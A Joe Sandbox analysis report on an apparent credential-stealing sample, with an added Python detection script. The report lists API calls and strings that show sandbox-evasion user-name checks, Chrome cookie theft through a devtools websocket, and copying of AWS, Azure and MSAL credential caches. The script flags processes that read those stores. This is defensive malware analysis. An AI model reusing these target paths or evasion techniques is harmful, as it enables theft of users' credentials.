  • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
  • Part of subcall function 00FF1E6D: GetSystemTime.KERNEL32(?,010157AE,?), ref: 00FF1E9C
  • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
  • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
  • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
  • Part of subcall function 00FF07EA: lstrcpyA.KERNEL32(00000000,?,0000000C,00FF74CC,010157A7), ref: 00FF0818
  • Part of subcall function 00FF07EA: lstrcatA.KERNEL32(?,?), ref: 00FF0822
  • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
• CopyFileA.KERNEL32(?,?,00000001), ref: 00FE8BFB
• GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00FE8C50
                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00FE8C57
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00FE8CF1
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?), ref: 00FE8D0A
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 00FE8D14
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,010161B4), ref: 00FE8D20
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 00FE8D2A
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,010161B8), ref: 00FE8D36
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?), ref: 00FE8D43
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 00FE8D4D
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,010161BC), ref: 00FE8D59
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?), ref: 00FE8D66
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 00FE8D70
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,010161C0), ref: 00FE8D7C
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?), ref: 00FE8D89
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 00FE8D93
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,010161C4), ref: 00FE8D9F
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,010161C8), ref: 00FE8DAB
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00FE8DE4
                                                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 00FE8E31
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTime
                                                                                                                                                                                                                                                          • String ID: passwords.txt
                                                                                                                                                                                                                                                          • API String ID: 1139693110-347816968
                                                                                                                                                                                                                                                          • Opcode ID: 68f50256d6731b91776bc66ab5a315dd31cf9fc75ee92d08ca46ba24eb4f767a
                                                                                                                                                                                                                                                          • Instruction ID: e92b2b748d46392029810e59e3dcbde4b792e926c046a3c354fcd05b99a1c2c9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 68f50256d6731b91776bc66ab5a315dd31cf9fc75ee92d08ca46ba24eb4f767a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD814832900108AFCF51BBA1FE0A9DE7B75BF18301F504021FB01B6166DB7A6E15EB95
APIs
• GetUserNameA.ADVAPI32(?,?), ref: 00FE1A03
• lstrcmpiA.KERNEL32(01019C70,?), ref: 00FE1A1E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: NameUserlstrcmpi
• String ID: CurrentUser$Emily$HAPUBWS$Hong Lee$IT-ADMIN$John Doe$Johnson$Miller$Peter Wilson$Sand box$WDAGUtilityAccount$maltest$malware$milozs$sandbox$test user$timmy$user$virus
• API String ID: 542268695-1784693376
• Opcode ID: 25540a6aa918b7f09bb8053e040dc8b692e900aab7aff8d6b8c20b25fba22f37
• Instruction ID: 558a180c62e6b107e961c113c9346e59405f939dc38921f59f3b101f8bb89615
• Opcode Fuzzy Hash: 25540a6aa918b7f09bb8053e040dc8b692e900aab7aff8d6b8c20b25fba22f37
• Instruction Fuzzy Hash: 1421B3B190126C8BCB28DF55DC696DEBBF4AB4670CF4041D895C9AA208CB384A89DF81
APIs
  • Part of subcall function 00FE7ECC: InternetOpenA.WININET(WebSocketClient,00000001,00000000,00000000,00000000), ref: 00FE7EF4
  • Part of subcall function 00FEF3BD: memchr.MSVCRT ref: 00FEF426
  • Part of subcall function 00FEF54B: std::_Xinvalid_argument.LIBCPMT ref: 00FEF561
• _memset.LIBCMT ref: 00FE80F5
• lstrcatA.KERNEL32(?,ws://localhost:9223,?,10000000,?), ref: 00FE810F
• lstrcatA.KERNEL32(?,?), ref: 00FE812A
• connect_to_websocket.CHROME(?,?), ref: 00FE8140
• _memset.LIBCMT ref: 00FE815D
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,Cookies), ref: 00FE8171
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,010160C8), ref: 00FE8183
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 00FE8196
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,010160CC), ref: 00FE81A8
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 00FE81BB
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,.txt), ref: 00FE81CD
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00FE81D9
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00FE81F7
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00FE823F
                                                                                                                                                                                                                                                          • free_result.CHROME(?), ref: 00FE824D
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrcat$_memset$lstrlen$InternetOpenXinvalid_argumentconnect_to_websocketfree_resultmemchrstd::_
                                                                                                                                                                                                                                                          • String ID: .txt$/devtools$Cookies$localhost$ws://localhost:9223
                                                                                                                                                                                                                                                          • API String ID: 2702209820-4155744131
                                                                                                                                                                                                                                                          • Opcode ID: bb33eaf581800945ee7772bdfb6808caf60ffd76321f167929c6b7079c33649f
                                                                                                                                                                                                                                                          • Instruction ID: c3f3592a99ed5d6214edfaa108fda15cb65aa06b2e17b8a14964f69fda60daed
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bb33eaf581800945ee7772bdfb6808caf60ffd76321f167929c6b7079c33649f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A513C72D4066C9FCB21EBA5DC45ADBBB78BB08302F4044E5B208E7141EB759A888F50
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00FF66BF
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1FDF: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00FF2020
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00FF66DE
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,\.azure\), ref: 00FF66FB
                                                                                                                                                                                                                                                            • Part of subcall function 00FF61AE: wsprintfA.USER32 ref: 00FF61F5
                                                                                                                                                                                                                                                            • Part of subcall function 00FF61AE: FindFirstFileA.KERNEL32(?,?), ref: 00FF620C
                                                                                                                                                                                                                                                            • Part of subcall function 00FF61AE: StrCmpCA.SHLWAPI(?,01015A9C), ref: 00FF622D
                                                                                                                                                                                                                                                            • Part of subcall function 00FF61AE: StrCmpCA.SHLWAPI(?,01015AA0), ref: 00FF6247
                                                                                                                                                                                                                                                            • Part of subcall function 00FF61AE: wsprintfA.USER32 ref: 00FF626E
                                                                                                                                                                                                                                                            • Part of subcall function 00FF61AE: StrCmpCA.SHLWAPI(?,0101565D), ref: 00FF6282
                                                                                                                                                                                                                                                            • Part of subcall function 00FF61AE: wsprintfA.USER32 ref: 00FF629F
                                                                                                                                                                                                                                                            • Part of subcall function 00FF61AE: PathMatchSpecA.SHLWAPI(?,?), ref: 00FF62CC
                                                                                                                                                                                                                                                            • Part of subcall function 00FF61AE: lstrcatA.KERNEL32(?), ref: 00FF6302
                                                                                                                                                                                                                                                            • Part of subcall function 00FF61AE: lstrcatA.KERNEL32(?,01015AB8), ref: 00FF6314
                                                                                                                                                                                                                                                            • Part of subcall function 00FF61AE: lstrcatA.KERNEL32(?,?), ref: 00FF6327
                                                                                                                                                                                                                                                            • Part of subcall function 00FF61AE: lstrcatA.KERNEL32(?,01015ABC), ref: 00FF6339
                                                                                                                                                                                                                                                            • Part of subcall function 00FF61AE: lstrcatA.KERNEL32(?,?), ref: 00FF634D
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00FF6733
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00000000), ref: 00FF6755
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,\.aws\), ref: 00FF6772
                                                                                                                                                                                                                                                            • Part of subcall function 00FF61AE: wsprintfA.USER32 ref: 00FF62B6
                                                                                                                                                                                                                                                            • Part of subcall function 00FF61AE: CopyFileA.KERNEL32(?,?,00000001), ref: 00FF6406
                                                                                                                                                                                                                                                            • Part of subcall function 00FF61AE: DeleteFileA.KERNEL32(?), ref: 00FF647A
                                                                                                                                                                                                                                                            • Part of subcall function 00FF61AE: FindNextFileA.KERNEL32(?,?), ref: 00FF64DC
                                                                                                                                                                                                                                                            • Part of subcall function 00FF61AE: FindClose.KERNEL32(?), ref: 00FF64F0
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00FF67A7
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00000000), ref: 00FF67C9
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00FF67E6
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00FF681B
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: lstrcat$File_memsetwsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
• String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
• API String ID: 780282842-974132213
• Opcode ID: 8bc55519e57f1a2f5b2e78faa2e323bbd28bd96eafea6c2fb117b1b4b42a399c
• Instruction ID: a36a0b18011254f405154bfe9fb5284f84f87da17fc56ce6efd6e98f4408b89f
• Opcode Fuzzy Hash: 8bc55519e57f1a2f5b2e78faa2e323bbd28bd96eafea6c2fb117b1b4b42a399c
• Instruction Fuzzy Hash: 6141837298021C6FDB24EB61EC4BFEE737CBF09700F440495B744EA195EAB89A849F50
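The String IDs above (`\.aws\`, `\.azure\`, `\.IdentityService\`, `msal.cache`, `*.*`) together with the Find/Copy/Delete API ID describe a routine that enumerates the user's cloud CLI credential directories and copies what it finds. The script below is an added hunting example, not part of the Joe Sandbox report and not code from the sample: it runs that observation as detection logic over file-access telemetry. The target path fragments are taken from the listing; the event format (`pid|image|operation|path`), the allow-list of expected readers, the constructed sample events and the severity scheme are assumptions for the example.

```python
"""Flag processes that enumerate or copy cloud CLI credential caches.

Added example; not from the Joe Sandbox report or the analysed sample.
Path markers come from the function's String IDs; everything else is assumed.
"""
import re
from collections import defaultdict

# (label, lowercase marker) for the directories the sample appends to the user
# profile before FindFirstFile/CopyFile. Labels keep the on-disk spelling.
CRED_DIR_MARKERS = (
    (".aws", "\\.aws\\"),
    (".azure", "\\.azure\\"),
    (".IdentityService", "\\.identityservice\\"),
)
CRED_FILE_MARKERS = ("msal.cache",)

# Assumed allow-list: image basenames expected to read these caches on a
# developer workstation. Tune per environment.
EXPECTED_READERS = {"aws.exe", "az.cmd", "python.exe", "pwsh.exe",
                    "powershell.exe", "code.exe", "devenv.exe", "dotnet.exe"}

# Operations that move file content, as opposed to merely listing a directory.
COPY_OPS = {"copyfile", "readfile", "createfilemapping"}

# Assumed event shape: "<pid>|<image path>|<operation>|<target path>".
EVENT_RE = re.compile(r"^(?P<pid>\d+)\|(?P<image>[^|]+)\|(?P<op>[^|]+)\|(?P<path>.+)$")


def parse_event(line):
    """Parse one telemetry line into a dict, or return None if malformed."""
    m = EVENT_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    ev["pid"] = int(ev["pid"])
    ev["path"] = ev["path"].replace("/", "\\")
    return ev


def cred_dir_for(path):
    """Return the credential store label a path falls under, or None."""
    p = path.lower()
    for label, marker in CRED_DIR_MARKERS:
        if marker in p:
            return label
    if any(f in p for f in CRED_FILE_MARKERS):
        return "msal.cache"
    return None


def hunt(lines):
    """One finding per non-allow-listed process touching credential stores.

    Severity is 'high' when the process reads or copies the files (staging for
    exfiltration) and 'medium' when it only enumerates them.
    """
    per_proc = defaultdict(lambda: {"image": "", "dirs": set(), "copied": []})
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        target = cred_dir_for(ev["path"])
        if target is None:
            continue
        basename = ev["image"].rsplit("\\", 1)[-1].lower()
        if basename in EXPECTED_READERS:
            continue
        rec = per_proc[ev["pid"]]
        rec["image"] = ev["image"]
        rec["dirs"].add(target)
        if ev["op"].lower() in COPY_OPS:
            rec["copied"].append(ev["path"])
    return [
        {
            "pid": pid,
            "image": rec["image"],
            "dirs": sorted(rec["dirs"]),
            "copied": rec["copied"],
            "severity": "high" if rec["copied"] else "medium",
        }
        for pid, rec in sorted(per_proc.items())
    ]


# Constructed telemetry for the example (not from the report's dynamic analysis).
SAMPLE_EVENTS = """
4120|C:\\Users\\dev\\Downloads\\njrtdhadawt.exe|FindFirstFile|C:\\Users\\dev\\.aws\\*.*
4120|C:\\Users\\dev\\Downloads\\njrtdhadawt.exe|CopyFile|C:\\Users\\dev\\.aws\\credentials
4120|C:\\Users\\dev\\Downloads\\njrtdhadawt.exe|CopyFile|C:\\Users\\dev\\.azure\\msal_token_cache.json
4120|C:\\Users\\dev\\Downloads\\njrtdhadawt.exe|FindFirstFile|C:\\Users\\dev\\AppData\\Local\\.IdentityService\\*.*
4120|C:\\Users\\dev\\Downloads\\njrtdhadawt.exe|CopyFile|C:\\Users\\dev\\AppData\\Local\\.IdentityService\\msal.cache
2210|C:\\Program Files\\Amazon\\AWSCLIV2\\aws.exe|ReadFile|C:\\Users\\dev\\.aws\\credentials
3300|C:\\Windows\\explorer.exe|FindFirstFile|C:\\Users\\dev\\Documents\\*.*
5100|C:\\Users\\dev\\tools\\backup.exe|FindFirstFile|C:\\Users\\dev\\.azure\\*.*
""".strip().splitlines()

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

The allow-list is the weak point of any such rule: a stealer injected into `python.exe` or `code.exe` would pass it, so pair the path check with the process-injection and self-deletion signatures the report already raises rather than relying on it alone.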
APIs
  • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
  • Part of subcall function 00FF1E6D: GetSystemTime.KERNEL32(?,010157AE,?), ref: 00FF1E9C
  • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
  • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
  • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
  • Part of subcall function 00FF07EA: lstrcpyA.KERNEL32(00000000,?,0000000C,00FF74CC,010157A7), ref: 00FF0818
  • Part of subcall function 00FF07EA: lstrcatA.KERNEL32(?,?), ref: 00FF0822
  • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
• CopyFileA.KERNEL32(?,?,00000001), ref: 00FEADC4
• GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00FEAECE
• HeapAlloc.KERNEL32(00000000), ref: 00FEAED5
• StrCmpCA.SHLWAPI(?,01016410,00000000), ref: 00FEAF86
• StrCmpCA.SHLWAPI(?,01016414), ref: 00FEAFAE
• lstrcatA.KERNEL32(00000000,?), ref: 00FEAFD2
• lstrcatA.KERNEL32(00000000,01016418), ref: 00FEAFDE
• lstrcatA.KERNEL32(00000000,?), ref: 00FEAFE8
• lstrcatA.KERNEL32(00000000,0101641C), ref: 00FEAFF4
• lstrcatA.KERNEL32(00000000,?), ref: 00FEAFFE
• lstrcatA.KERNEL32(00000000,01016420), ref: 00FEB00A
• lstrcatA.KERNEL32(00000000,?), ref: 00FEB014
• lstrcatA.KERNEL32(00000000,01016424), ref: 00FEB020
• lstrcatA.KERNEL32(00000000,?), ref: 00FEB02A
• lstrcatA.KERNEL32(00000000,01016428), ref: 00FEB036
• lstrcatA.KERNEL32(00000000,?), ref: 00FEB040
• lstrcatA.KERNEL32(00000000,0101642C), ref: 00FEB04C
• lstrcatA.KERNEL32(00000000,?), ref: 00FEB056
• lstrcatA.KERNEL32(00000000,01016430), ref: 00FEB062
• lstrlenA.KERNEL32(00000000), ref: 00FEB0B4
• lstrlenA.KERNEL32(?), ref: 00FEB0CF
• DeleteFileA.KERNEL32(?), ref: 00FEB112
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmp
